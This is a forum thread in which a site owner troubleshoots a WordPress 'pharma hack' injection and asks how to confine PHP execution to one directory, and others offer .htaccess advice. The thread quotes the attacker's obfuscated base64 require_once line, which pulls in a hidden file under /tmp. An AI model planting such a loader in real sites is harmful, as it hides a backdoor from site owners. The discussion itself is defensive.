We are being hacked again: the old Pharma hack..
How do I stop PHP from executing in any directory except the WordPress installation, which is
/public_html/blog
??
These guys are inserting this into the top of lots of pages outside the /blog directory and I can't figure out how. I have changed passwords and examined all log in logs and I see no suspicious activity. Lot of break in attempts as usual, but all failed log ins. Today we discovered in /blog/wp-content/themes/default/images/tmp/ hackers files and 8000! yes count'em 8000 *.html file which we copies of articles in WP with Pharma stuff at the top!
<?php
require_once(base64_decode("L3RtcC9JbWFnZU1hZ2ljay02LjQuNC9QZXJsTWFnaWNrL2xpYi92c3A="));
which is:
<?php include('/tmp/ImageMagick-6.4.4/PerlMagick/lib/bcp');
?>this is bogus... it is there and it had time stamp of 2008... our real ImageMagick is in /opt which i the one we actually call and use. I just deleted it... and am continuing to clean the server... we may have to completely reintall WP and be content to let all the archives go. if they have inserted stuff into an actual image, then I'm not sure how you could ever find that.
At any rate I looked thru the WebMin options for PHP and also the VirtualMin options for specific domains and I don't where to tweak a setting that prevents PHP from executing only in /blog directory. We don't use PHP anywhere else (and never will!)
Howdy,
If you're interested in setting one or more directories (and their subdirectories) so that PHP code doesn't execute in them -- you could always create a .htaccess file in that directory, and put something like this in it:
AddType text/plain .phpThat would make all PHP code show up as plain text in the browser, rather than executing.
However, what you may want to do is look at the timestamps for your modified PHP files, and compare that to entries in $HOME/logs/access_log. That may assist you in determining who/what is responsible for the breach.
-Eric
really that is bad idea to set
AddType text/plain .php
because visitors and hackers would be able to see source of your php files and for sure here will be an config file which would include mysql logins, in result database can be removed!
better to block php files via htaccess as filetype!
"block php files by file type"
OK what would that directive look like?
We want to block execution of any php strings in all .html .shtml .txt files
can it added to the httpd.conf segment for a particular domain so that php only executes in
/public_html/blog
and no where else? Well, since /blog runs on *.php it should work if I can prevent execution in .html .shtml .txt files.
@stels88
You suggested to stop PHP that is place in .html or .shtml files to "block php files by file type"
What does the directive look like?
Since we have no PHP in any .html file that could expose the database or anything like that. Eric's directive would work, But if I put:
AddType text/plain .php
in the top .htaccess file
now to we then enable PHP in a lower directory /blog
but, as it looks today, we are looking to upgrade the whole machine to the latest OS, latest PHP, etc. and harden security. AS some said on another thread we are just wasting our time picking at this since we really don't know where the vulnerability, is, but still i would like to under stand how PHP can be executed in .html files? and how to stop that.
Well, technically, I don't think it can be by default.
Try creating a new file called "test.html", and in it, put this:
<div class="codeblock"><pre><code><span style="color: #000000"><span style="color: #0000BB"><?php<br /> phpinfo</span><span style="color: #007700">(); <br /></span><span style="color: #0000BB">?></span></span></code></pre></div>If you then call that test.html in your browser, do you get a long PHP screen? Or do you just get the above line (or maybe even a blank page)?
-Eric
Well my symptoms indicate it is on (php string execute from any file time) by default.
And, yes, testing is as you say a "no brainer" and I have already tested this. Using the php date string call. A date inserted in the first line. and using php phpinfo() as you suggest: we get the entire screen for PHP ini displayed. So, that's the problem.
There are no rogue .htaccess file insertions containing: AddType application/x-httpd-php .html .shtml ( I grepped the whole server for any instance of this in a .htaccess file - came up with no output.)
But you say VirtualMin/WebMin does not activate PHP in html files by default... httpd.conf has not been modified since May of this year. the only customization I did then was to include DEFLATE several years ago. I don't know if this is a hole:
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/x-javascript application/x-httpd-php
the httpd.conf directives are all otherwise being "poked" from VirtualMin/WebMin..
things like this:
AddHandler fcgid-script .php AddHandler fcgid-script .php5 FCGIWrapper /home/ling/fcgi-bin/php5.fcgi .php FCGIWrapper /home/ling/fcgi-bin/php5.fcgi .php5
and
Options ExecCGI FollowSymLinks Includes Indexes php_value memory_limit 64M php_value safe_mode Off php_value file_uploads On php_value magic_quotes_gpc Off php_value register_globals Off RemoveHandler .php RemoveHandler .php5 IPCCommTimeout 31
are all set from inside Virtual Min.. and I don' see anything anywhere that relates to the execution (or prevention of execution) of PHP in .html or .shtml files.
So, it appears to be activated by defaults..
Again: same question I asked from the beginning:
How do we simply "turn off" php execution in any files that do not end with ".php" ?
So my issue is: even if we do upgrade the machine, to CentOS6.2 (or whatever) and the latest PHP and we change all out password and reinstall WordPress from the ground up and clean the WP database, I still feel like we might have a hole because I never found it in the first place... to "jail in" php to only execute the Word Press directory (/public_html/blog/ is really one of the most important things we need to do.
I do see this as an option:
I could add a .htaccess file to every top level folder except /blog
OPTIONS -ExecCGI
but them my *.irev files many not run
On the web there are ton's of references to enabling PHP in html files but not preventing execution in html files....
still searching...